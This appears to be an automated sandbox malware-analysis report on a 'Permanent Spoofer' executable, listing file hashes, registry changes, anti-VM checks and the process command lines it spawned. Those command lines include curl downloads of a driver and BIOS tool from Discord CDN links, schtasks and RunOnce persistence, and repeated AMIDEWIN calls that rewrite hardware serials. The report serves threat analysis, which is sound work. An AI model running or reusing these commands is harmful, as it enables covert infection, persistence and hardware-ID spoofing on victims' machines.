| N/A | N/A | \??\c:\windows\resources\themes\explorer.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\themes\explorer.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\spoolsv.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\spoolsv.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\svchost.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\svchost.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\spoolsv.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\spoolsv.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\Spoofer.exe
"C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\Spoofer.exe"
\??\c:\users\admin\appdata\local\temp\oh no\permanent spoofer\spoofer.exeÂ
"c:\users\admin\appdata\local\temp\oh no\permanent spoofer\spoofer.exe "
C:\Windows\Resources\Themes\icsys.icn.exe
C:\Windows\Resources\Themes\icsys.icn.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c color 1
\??\c:\windows\resources\themes\explorer.exe
c:\windows\resources\themes\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/1154954276758634506/1155262042295513219/amifldrv64.sys -o C:\Windows\amifldrv64.sys --silent
\??\c:\windows\resources\spoolsv.exe
c:\windows\resources\spoolsv.exe SE
\??\c:\windows\resources\svchost.exe
c:\windows\resources\svchost.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/1154954276758634506/1155262042731716658/AMIDEWINx64.EXE -o C:\Windows\AMIDEWINx64.EXE --silent
\??\c:\windows\resources\spoolsv.exe
c:\windows\resources\spoolsv.exe PR
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /IVN DHQX992121213-%RANDOM% >nul
C:\Windows\Explorer.exe
C:\Windows\Explorer.exe
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "svchost" /tr "c:\windows\resources\svchost.exe" /sc daily /st 20:18 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /IV DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /IV DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /SM DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /SP DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /SV DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /SS DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /SU AUTO >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /SK DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /SF DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /BM DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /BP DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /BV DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /BS DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /BT DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /BLC DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /CM DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /CV DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /CS DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /CA DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /CSK DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /PSN DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /PAT DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /PPN DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 1 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 2 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 3 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 4 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 5 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 6 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 7 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 8 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 9 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 10 DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /OS 11 DHQX992121213-%RANDOM% >nul
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "svchost" /tr "c:\windows\resources\svchost.exe" /sc daily /st 20:19 /f
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "svchost" /tr "c:\windows\resources\svchost.exe" /sc daily /st 20:20 /f
Network
Files
memory/1956-0-0x0000000000400000-0x0000000000A16000-memory.dmp
memory/1956-1-0x0000000077930000-0x0000000077932000-memory.dmp
\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\spoofer.exeÂ
| MD5 | 407f16d056d7bbfc4f50042565aaf71c |
| SHA1 | 183a360c72e6fe19e367acc3a63fc64b7b987747 |
| SHA256 | fcd04587bc69ac61f1d59897fb35f248a1f97a3549df838d00321d73d65fe570 |
| SHA512 | 6829e640918a28017e44c69647f8842825b5161b710afcee315c5afdad52248925912fb0614767d4b911712a7608a1a9a68a992a6121fcba2f785c131895e271 |
\Windows\Resources\Themes\icsys.icn.exe
| MD5 | 5036deedb789b134425f4412a6c49502 |
| SHA1 | 31e878b0f935e24ebe78dcfabbd4a11b0462c24e |
| SHA256 | 8c8dfe4cdba22f65f47851f9f5939fb31c02f8c67b1ed3de782557de6ef5d9fd |
| SHA512 | fa2a0e379164d130490037af4159bd8713b7d1265116eecb0339f0ef1ffc529764c31836ea46cdee1eb7dce0ad078b3aa86661081d1d71ecd208d4124ad650b6 |
memory/1956-14-0x00000000036D0000-0x0000000003CE6000-memory.dmp
memory/2488-15-0x0000000000400000-0x0000000000A16000-memory.dmp
\Windows\Resources\Themes\explorer.exe
| MD5 | 33b4643612c2024d567a61cd363b607c |
| SHA1 | dac235df23a784f3a035fe9bbe27338c754054a0 |
| SHA256 | 4363df19108eee01c3b3227d2b2c78a6d6446abcca788a0a08dd883f18a36063 |
| SHA512 | c7b7fbe502f400b996047ddc47311e54e76c0b1b789ca2257ca876d338daffb74cd5bbac80375aaf5d0084e88da3b236b98b1ad13a95cbd36216241c302f3af4 |
memory/2488-27-0x00000000036D0000-0x0000000003CE6000-memory.dmp
memory/2724-28-0x0000000000400000-0x0000000000A16000-memory.dmp
\Windows\Resources\spoolsv.exe
| MD5 | 7753d5d74580eb85af24ef15f66a0ec9 |
| SHA1 | aa921eec287f33136e837ed3562c3b83b760453c |
| SHA256 | 8abb1e90803db4485b73793b1712515f80c188bdef433cea9c1af4335ec010b3 |
| SHA512 | 15325d8fcaca3e42c5d935a2aa82bb4eb927cbe0947b2c2330a670a4064b51778c99d3ee7d6ab89757901816560eb8cea923c8e992dd0e6e7f061824304ca72f |
memory/2724-37-0x00000000036D0000-0x0000000003CE6000-memory.dmp
memory/2952-40-0x0000000000400000-0x0000000000A16000-memory.dmp
C:\Windows\Resources\svchost.exe
| MD5 | 6c0366b8162110104bb2703971420d8d |
| SHA1 | ae451d535bc73330032daaf6e607b6579221773c |
| SHA256 | cce819e3f3caacdca057281e0ecdedc217dce157fbdedbe19675e811d8f770ed |
| SHA512 | b3c8a18b9f11cacc43fedbaceaa0701f7d5bd90445a36cdfdc9eb2b73e1d3426f9a3a63c7182be76536ddb79dbf527078e2230fa3d3defeb1385c87be0c6be61 |
memory/1956-53-0x0000000000400000-0x0000000000A16000-memory.dmp
memory/1988-52-0x0000000000400000-0x0000000000A16000-memory.dmp
memory/2952-51-0x0000000003750000-0x0000000003D66000-memory.dmp
memory/2172-62-0x0000000000400000-0x0000000000A16000-memory.dmp
memory/1988-60-0x0000000003340000-0x0000000003956000-memory.dmp
memory/1956-59-0x00000000036D0000-0x0000000003CE6000-memory.dmp
memory/2952-67-0x0000000000400000-0x0000000000A16000-memory.dmp
memory/2172-69-0x0000000000400000-0x0000000000A16000-memory.dmp
memory/2488-71-0x0000000000400000-0x0000000000A16000-memory.dmp
memory/1956-73-0x0000000000400000-0x0000000000A16000-memory.dmp
memory/2724-74-0x0000000000400000-0x0000000000A16000-memory.dmp
memory/1988-75-0x0000000000400000-0x0000000000A16000-memory.dmp
memory/2724-76-0x0000000000400000-0x0000000000A16000-memory.dmp
memory/1988-77-0x0000000003340000-0x0000000003956000-memory.dmp
memory/2724-87-0x0000000000400000-0x0000000000A16000-memory.dmp
memory/1988-88-0x0000000000400000-0x0000000000A16000-memory.dmp
memory/2724-89-0x0000000000400000-0x0000000000A16000-memory.dmp
memory/2724-99-0x0000000000400000-0x0000000000A16000-memory.dmp
memory/1988-100-0x0000000000400000-0x0000000000A16000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-09-27 20:10
Reported
2024-09-27 20:19
Platform
win10v2004-20240802-en
Max time kernel
150s
Max time network
145s
Command Line
Signatures
Modifies visiblity of hidden/system files in Explorer
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | \??\c:\windows\resources\themes\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | \??\c:\windows\resources\svchost.exe | N/A |
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\Spoofer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Windows\Resources\Themes\icsys.icn.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | \??\c:\windows\resources\themes\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | \??\c:\windows\resources\spoolsv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | \??\c:\windows\resources\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | \??\c:\windows\resources\spoolsv.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Windows\Resources\Themes\icsys.icn.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | \??\c:\windows\resources\themes\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | \??\c:\windows\resources\spoolsv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | \??\c:\windows\resources\spoolsv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\Resources\Themes\icsys.icn.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\Spoofer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | \??\c:\windows\resources\themes\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | \??\c:\windows\resources\spoolsv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | \??\c:\windows\resources\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | \??\c:\windows\resources\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | \??\c:\windows\resources\spoolsv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\Spoofer.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | \??\c:\users\admin\appdata\local\temp\oh no\permanent spoofer\spoofer.exe | N/A |
| N/A | N/A | C:\Windows\Resources\Themes\icsys.icn.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\themes\explorer.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\spoolsv.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\svchost.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\spoolsv.exe | N/A |
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer = "c:\\windows\\resources\\themes\\explorer.exe RO" | \??\c:\windows\resources\themes\explorer.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Svchost = "c:\\windows\\resources\\svchost.exe RO" | \??\c:\windows\resources\themes\explorer.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer = "c:\\windows\\resources\\themes\\explorer.exe RO" | \??\c:\windows\resources\svchost.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Svchost = "c:\\windows\\resources\\svchost.exe RO" | \??\c:\windows\resources\svchost.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\Spoofer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Windows\Resources\Themes\icsys.icn.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | \??\c:\windows\resources\themes\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | \??\c:\windows\resources\spoolsv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | \??\c:\windows\resources\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | \??\c:\windows\resources\spoolsv.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\explorer.exe | \??\c:\windows\resources\themes\explorer.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\explorer.exe | \??\c:\windows\resources\svchost.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\Spoofer.exe | N/A |
| N/A | N/A | C:\Windows\Resources\Themes\icsys.icn.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\themes\explorer.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\spoolsv.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\svchost.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\spoolsv.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | \??\c:\windows\resources\themes\explorer.exe | C:\Windows\Resources\Themes\icsys.icn.exe | N/A |
| File opened for modification | \??\c:\windows\resources\spoolsv.exe | \??\c:\windows\resources\themes\explorer.exe | N/A |
| File created | C:\Windows\amifldrv64.sys | C:\Windows\system32\curl.exe | N/A |
| File opened for modification | \??\c:\windows\resources\svchost.exe | \??\c:\windows\resources\spoolsv.exe | N/A |
| File created | C:\Windows\AMIDEWINx64.EXE | C:\Windows\system32\curl.exe | N/A |
| File opened for modification | C:\Windows\Resources\tjud.exe | \??\c:\windows\resources\themes\explorer.exe | N/A |
| File opened for modification | C:\Windows\Resources\Themes\icsys.icn.exe | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\Spoofer.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\windows\resources\themes\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\windows\resources\spoolsv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\windows\resources\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\windows\resources\spoolsv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\Spoofer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Resources\Themes\icsys.icn.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\discord-1086389167996547133\DefaultIcon | \??\c:\users\admin\appdata\local\temp\oh no\permanent spoofer\spoofer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\discord-1086389167996547133\shell | \??\c:\users\admin\appdata\local\temp\oh no\permanent spoofer\spoofer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\discord-1086389167996547133\shell\open\command\ = "c:\\users\\admin\\appdata\\local\\temp\\oh no\\permanent spoofer\\spoofer.exe\u00a0" | \??\c:\users\admin\appdata\local\temp\oh no\permanent spoofer\spoofer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\discord-1086389167996547133\shell\open\command | \??\c:\users\admin\appdata\local\temp\oh no\permanent spoofer\spoofer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\discord-1086389167996547133\shell\open | \??\c:\users\admin\appdata\local\temp\oh no\permanent spoofer\spoofer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\discord-1086389167996547133 | \??\c:\users\admin\appdata\local\temp\oh no\permanent spoofer\spoofer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\discord-1086389167996547133\ = "URL:Run game 1086389167996547133 protocol" | \??\c:\users\admin\appdata\local\temp\oh no\permanent spoofer\spoofer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\discord-1086389167996547133\URL Protocol | \??\c:\users\admin\appdata\local\temp\oh no\permanent spoofer\spoofer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\discord-1086389167996547133\DefaultIcon\ = "c:\\users\\admin\\appdata\\local\\temp\\oh no\\permanent spoofer\\spoofer.exe\u00a0" | \??\c:\users\admin\appdata\local\temp\oh no\permanent spoofer\spoofer.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | \??\c:\windows\resources\themes\explorer.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\svchost.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | \??\c:\users\admin\appdata\local\temp\oh no\permanent spoofer\spoofer.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\Spoofer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\Spoofer.exe | N/A |
| N/A | N/A | C:\Windows\Resources\Themes\icsys.icn.exe | N/A |
| N/A | N/A | C:\Windows\Resources\Themes\icsys.icn.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\themes\explorer.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\themes\explorer.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\spoolsv.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\spoolsv.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\svchost.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\svchost.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\spoolsv.exe | N/A |
| N/A | N/A | \??\c:\windows\resources\spoolsv.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\Spoofer.exe
"C:\Users\Admin\AppData\Local\Temp\oh no\Permanent Spoofer\Spoofer.exe"
\??\c:\users\admin\appdata\local\temp\oh no\permanent spoofer\spoofer.exeÂ
"c:\users\admin\appdata\local\temp\oh no\permanent spoofer\spoofer.exe "
C:\Windows\Resources\Themes\icsys.icn.exe
C:\Windows\Resources\Themes\icsys.icn.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c color 1
\??\c:\windows\resources\themes\explorer.exe
c:\windows\resources\themes\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/1154954276758634506/1155262042295513219/amifldrv64.sys -o C:\Windows\amifldrv64.sys --silent
C:\Windows\system32\curl.exe
curl https://cdn.discordapp.com/attachments/1154954276758634506/1155262042295513219/amifldrv64.sys -o C:\Windows\amifldrv64.sys --silent
\??\c:\windows\resources\spoolsv.exe
c:\windows\resources\spoolsv.exe SE
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/1154954276758634506/1155262042731716658/AMIDEWINx64.EXE -o C:\Windows\AMIDEWINx64.EXE --silent
C:\Windows\system32\curl.exe
curl https://cdn.discordapp.com/attachments/1154954276758634506/1155262042731716658/AMIDEWINx64.EXE -o C:\Windows\AMIDEWINx64.EXE --silent
\??\c:\windows\resources\svchost.exe
c:\windows\resources\svchost.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /IVN DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /IV DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /IV DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /SM DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /SP DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /SV DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /SS DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /SU AUTO >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /SK DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /SF DHQX992121213-%RANDOM% >nul
\??\c:\windows\resources\spoolsv.exe
c:\windows\resources\spoolsv.exe PR
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /BM DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /BP DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /BV DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /BS DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /BT DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /BLC DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /CM DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /CV DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /CS DHQX992121213-%RANDOM% >nul
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\AMIDEWINx64.EXE /CA DHQX992121213-%RANDOM% >nul
